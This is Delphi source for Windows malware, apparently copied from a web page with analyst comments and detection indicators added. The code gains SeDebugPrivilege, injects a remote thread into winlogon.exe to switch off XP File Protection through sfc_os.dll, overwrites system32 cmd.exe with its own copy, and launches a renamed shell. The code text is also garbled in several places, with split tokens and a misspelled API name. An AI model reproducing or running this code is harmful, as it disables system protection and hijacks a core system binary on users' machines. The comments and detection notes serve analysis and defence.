Replace assumer.exe
{*************************************** ****************}
{}
{Change xper.exe for firewall protection}
{}
{}
{*************************************** ****************}
Program Project1;
Uses
Windows, TlHelp32;
Function LowerCase (const S: string): string; // ASCII-only lower-casing: just 'A'..'Z' are folded
Var
  I: Integer;
  C: Char;
Begin
  { The result has the same length as S; every position is written below,
    so an empty S simply yields an empty result. }
  SetLength(Result, Length(S));
  For I := 1 to Length(S) do
  Begin
    C := S[I];
    { Only the seven-bit upper-case range is changed (+32 = 'a' - 'A');
      digits, punctuation and anything above 'Z' pass through untouched. }
    If (C >= 'A') and (C <= 'Z') then
      C := Chr(Ord(C) + 32);
    Result[I] := C;
  End;
End;
Function createdmutexex (mutexname: pchar): Boolean; // single-instance guard on a named mutex
Var
  MutexObj: DWORD;
Begin
  { Create (and immediately own) the named mutex. }
  MutexObj := CreateMutex(nil, True, mutexname);
  { Only a successful create that reports ERROR_ALREADY_EXISTS means the name is already
    claimed. A failed create (MutexObj = 0) is not treated as a second instance: the
    function still returns True in that case. The handle is never closed, so the name
    stays claimed for the life of the process. }
  If (MutexObj <> 0) and (GetLastError = ERROR_ALREADY_EXISTS) then
  Begin
    Result := False;
    Exit;
  End;
  Result := True;
End;
Function getwinpath: string; // Windows directory, guaranteed to end in a separator
Var
  Path: array [0 .. MAX_PATH] of char;
Begin
  { The return value of GetWindowsDirectory is not inspected; the buffer is used as-is. }
  GetWindowsDirectory(Path, MAX_PATH);
  Result := Path;
  { NOTE: the separator tested for and appended here is a forward slash, as written on
    this page. The last-character test indexes Result directly, so an empty buffer is
    not handled specially. }
  If Result[Length(Result)] <> '/' then
    Result := Result + '/';
End;
Function GetTempDirectory: string; // temp directory, guaranteed to end in a separator
Var
  Path: array [0 .. MAX_PATH] of char;
Begin
  { The return value of GetTempPath is not inspected; the buffer is used as-is. }
  GetTempPath(MAX_PATH, Path);
  Result := Path;
  { NOTE: the separator tested for and appended here is a forward slash, as written on
    this page. The last-character test indexes Result directly, so an empty buffer is
    not handled specially. }
  If Result[Length(Result)] <> '/' then
    Result := Result + '/';
End;
{ Enables SeDebugPrivilege in the current process token.
  Returns the result of AdjustTokenPrivileges, or False when the privilege LUID
  cannot be looked up. Observations: the OpenProcessToken result is not checked
  before HToken is used, and HToken is never closed.
  Detection note: a non-debugger process enabling SeDebugPrivilege and then opening
  another process with full access (InitProcess below) is a common precursor to
  remote-thread injection and is worth alerting on. }
Function EnableDebugPriv: Boolean; // enable SeDebugPrivilege for this process
Var
HToken: THANDLE;
Tp: TTokenPrivileges;
Rl: Cardinal;
Begin
Result: = false;
// Return value ignored; HToken is used below even if this failed.
Openprocesstoken (getcurrentprocess (), token_adjust_privileges or token_query, htoken );
If lookupprivilegevalue (nil, 'sedebugprivilege', TP. Privileges [0]. luid) then
Begin
TP. privilegecount: = 1;
TP. Privileges [0]. attributes: = se_privilege_enabled;
// Result reflects only whether the adjust call succeeded.
Result: = adjusttokenprivileges (htoken, false, TP, sizeof (TP), nil, rl );
End;
End;
{ Analysis summary: resolves export #2 of sfc_os.dll by ordinal from this process's own
  mapping, frees that mapping again, then starts a remote thread in ProcessHandle at the
  resolved address and waits up to 4000 ms for it. None of the return values are checked
  (a nil address or a failed CreateRemoteThread is passed straight on), and the thread
  handle — declared as hmodule — is never closed. The page's own comment states the
  purpose is to switch off XP file protection inside winlogon.exe.
  Detection note: CreateRemoteThread with winlogon.exe as the target (Sysmon Event ID 8
  or equivalent EDR telemetry), preceded by a load of sfc_os.dll in the caller, is a
  high-confidence indicator for this technique. }
Procedure injectthread (processhandle: DWORD); // enter winlogon.exe to disable XP File Protection
VaR
TID: longword;
Hsfc, hthread: hmodule;
Pfncloseevents: pointer;
Begin
Hsfc: = loadlibrary ('sfc _ OS. dll ');
// Export looked up by ordinal, not by name.
Pfncloseevents: = getprocaddress (hsfc, makeintresource (2 ));
Freelibrary (hsfc );
// Remote thread in the target process; TID receives the new thread id.
HThread: = CreateRemoteThread (ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID );
// Bounded wait; the result is ignored.
WaitForSingleObject (hThread, 4000 );
End;
{ Walks the process list via a Toolhelp snapshot and, for the first entry whose
  lower-cased image name equals Name, opens it with PROCESS_ALL_ACCESS, hands the
  handle to InjectThread, closes it and stops. Name itself is compared as given —
  only the snapshot side is lower-cased. The OpenProcess result is not checked
  before it is passed on. The snapshot handle is closed on every path. }
Procedure InitProcess (Name: string); // find the process named Name and inject into it
Var
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
ProcessHandle: dword;
Begin
FSnapshotHandle: = createconlhelp32snapshot (TH32CS_SNAPPROCESS, 0 );
// dwSize must be set before the first Process32First call.
FProcessEntry32.dwSize: = Sizeof (FProcessEntry32 );
If Process32First (FSnapshotHandle, FProcessEntry32) then begin
Repeat
// Exact match against the lower-cased executable name from the snapshot.
If Name = LowerCase (FProcessEntry32.szExeFile) then
Begin
ProcessHandle: = OpenProcess (PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID );
InjectThread (ProcessHandle );
CloseHandle (ProcessHandle );
// Only the first matching process is touched.
Break;
End;
Until not Process32Next (FSnapshotHandle, FProcessEntry32 );
End;
CloseHandle (FSnapshotHandle );
End;
{ Program entry — analysis summary of what this block does, in order:
  1. single-instance guard on the named mutex MasterMutex; a second copy exits at once;
  2. acquire SeDebugPrivilege and exit if that fails;
  3. inject into winlogon.exe (InitProcess / InjectThread above);
  4. if this executable is not already the copy at <Windows dir>\ExpFile: move the
     existing <Windows dir>\ExpFile over system32/cmd.exe with MOVEFILE_REPLACE_EXISTING,
     then copy this executable to <Windows dir>\ExpFile;
  5. launch system32/cmder.exe.
  Indicators an analyst can take from this block: the mutex name (MasterMutex),
  the file name ExpFile in the Windows directory, cmd.exe being replaced, and a
  renamed shell cmder.exe under system32. The inline comment on the MoveFileEx line
  says it moves cmd.exe, but the arguments as written move ExpFile onto cmd.exe. }
Const ExpFile = 'assumer.exe ';
MasterMutex = 'opennull ';
Var
S: string;
Begin
If not CreatedMutexEx (MasterMutex) then ExitProcess (0); // single-instance guard
If not EnableDebugPriv then Exit; // privilege escalation failed: stop here
InitProcess('winlogon.exe '); // inject into winlogon.exe (page comment: disables XP file protection / system restore)
S: = ParamStr (0); // full path of this executable
If LowerCase (s) <> LowerCase (GetWinPath + ExpFile) then // not already running from the Windows-directory copy
Begin // if not
MoveFileEx (PChar (GetWinPath + ExpFile), PChar (GetWinPath + 'system32/cmd.exe '), MOVEFILE_REPLACE_EXISTING); // moves <Windows dir>\ExpFile onto system32/cmd.exe, replacing it
CopyFile (PChar (S), PChar (GetWinPath + ExpFile), false); // copy this executable to the Windows directory as ExpFile (overwrite allowed)
End;
WinExec (PChar (GetWinPath + 'system32/cmder.exe '), 1); // launch cmder.exe (the page's comment calls this the real cmd.exe)
End.